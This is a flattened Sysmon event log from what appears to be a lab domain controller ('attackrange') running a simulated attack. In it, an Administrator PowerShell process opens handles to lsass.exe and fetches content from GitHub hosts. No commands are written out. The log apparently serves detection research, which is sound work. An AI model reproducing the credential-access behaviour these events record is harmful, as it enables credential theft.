21:09:58.104{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A325-60D3-3706-00000000CF01}6172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025025Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.104{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A325-60D3-3706-00000000CF01}6172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025024Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.057{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A325-60D3-3706-00000000CF01}6172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025023Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.057{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A325-60D3-3706-00000000CF01}6172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000025022Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:09:58.026{4DB9351A-A325-60D3-3706-00000000CF01}6172\PSHost.132689561979102385.6172.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025021Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.010{4DB9351A-A325-60D3-3706-00000000CF01}6172ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_awfb5nuv.jme.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025020Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.010{4DB9351A-A325-60D3-3706-00000000CF01}6172ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_tgsvclqv.22q.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025019Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.995{4DB9351A-A325-60D3-3706-00000000CF01}6172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_tgsvclqv.22q.ps12021-06-23 21:09:57.995 23542300x800000000000000025018Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.995{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2769C6301CE1D25A7FE10D716CB8FAB7,SHA256=AA70DAEDBB96A753164E8A34A6B448589E4CC857A5FA8E7EF2AE9CDACE09778A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025083Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.495{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A327-60D3-3A06-00000000CF01}3596C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025082Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.495{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025081Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.495{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025080Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.495{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025079Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.495{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025078Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.495{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A327-60D3-3A06-00000000CF01}3596C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025077Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.495{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A327-60D3-3A06-00000000CF01}3596C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000025076Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.496{4DB9351A-A327-60D3-3A06-00000000CF01}3596C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000025075Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.323{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3920E482196F8E0238627DD96D5CAA69,SHA256=F8B27FBE5B7D4064DCAE1BDBE35653B8B4FE6A919E91548E95A8E386E05EA81E,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000025074Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:56.173{4DB9351A-A323-60D3-3406-00000000CF01}6980raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025073Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.120{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CBEBB2EB7564F1D1B22B4459FC7B201,SHA256=D07B694FFF31381EC61BF9D426E1D22E0D7D1B573F883CA7741849700BC5F5BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025089Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:00.510{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21259BBDC189D0C2D055F27532923931,SHA256=A70ABE37074D7DB8C08076961BA2CBA06FFD864280331A286AAC2AA6B5492288,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000025088Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.700{4DB9351A-A326-60D3-3906-00000000CF01}6228github.com0::ffff:192.30.255.113;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025087Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:00.214{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BEF833CC191F7C546F147308B8AD4525,SHA256=F5F36EECCB7839300D801003EBC567279AD1611DDACC06FD11337186811EBC91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025086Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:00.120{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A17F3A298EE4CB5245121E1D491413F,SHA256=1184998D2C9E53838FC573C0522D23DB6D9C67CBA3FABB7A3322F061294FBA7E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000025085Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.692{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53055- 354300x800000000000000025084Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.097{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local58298- 354300x800000000000000025095Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.463{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61532-false185.199.109.154cdn-185-199-109-154.github.com443https 354300x800000000000000025094Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.454{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local60268- 354300x800000000000000025093Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.292{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61531-false192.30.255.113lb-192-30-255-113-sea.github.com443https 354300x800000000000000025092Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.253{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61530-false10.0.1.12-8000- 354300x800000000000000025091Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.702{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61529-false192.30.255.113lb-192-30-255-113-sea.github.com443https 23542300x800000000000000025090Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:01.121{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8EF93CB9135E5ED53855D863FC949F9,SHA256=B9A3FB50F1F7A147A82F14BF8A608029C290724A7E987D793386052EC7B02BC2,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000025097Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.463{4DB9351A-A326-60D3-3906-00000000CF01}6228github-releases.githubusercontent.com0::ffff:185.199.109.154;::ffff:185.199.110.154;::ffff:185.199.111.154;::ffff:185.199.108.154;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025096Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:02.150{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F78EDC8A0CEEAFC1E87B62DE95E7EC23,SHA256=F066DE6FC6B0187D41590B2C81F4AF947E514332C28679C915A926F8F00A0557,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000025099Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:01.176{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local57055- 23542300x800000000000000025098Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:03.155{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=102DA7CFDB60E2FE9FFD72B173BE0A4B,SHA256=E1CECE5E2C55C09D42A75C37E11B02884BEA7BDF42E9A15EFB96EC08052EB5AD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025166Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.983{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32C-60D3-3E06-00000000CF01}332C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025165Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.983{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32C-60D3-3E06-00000000CF01}332C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025164Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.967{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025163Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.967{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025162Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.967{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025161Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 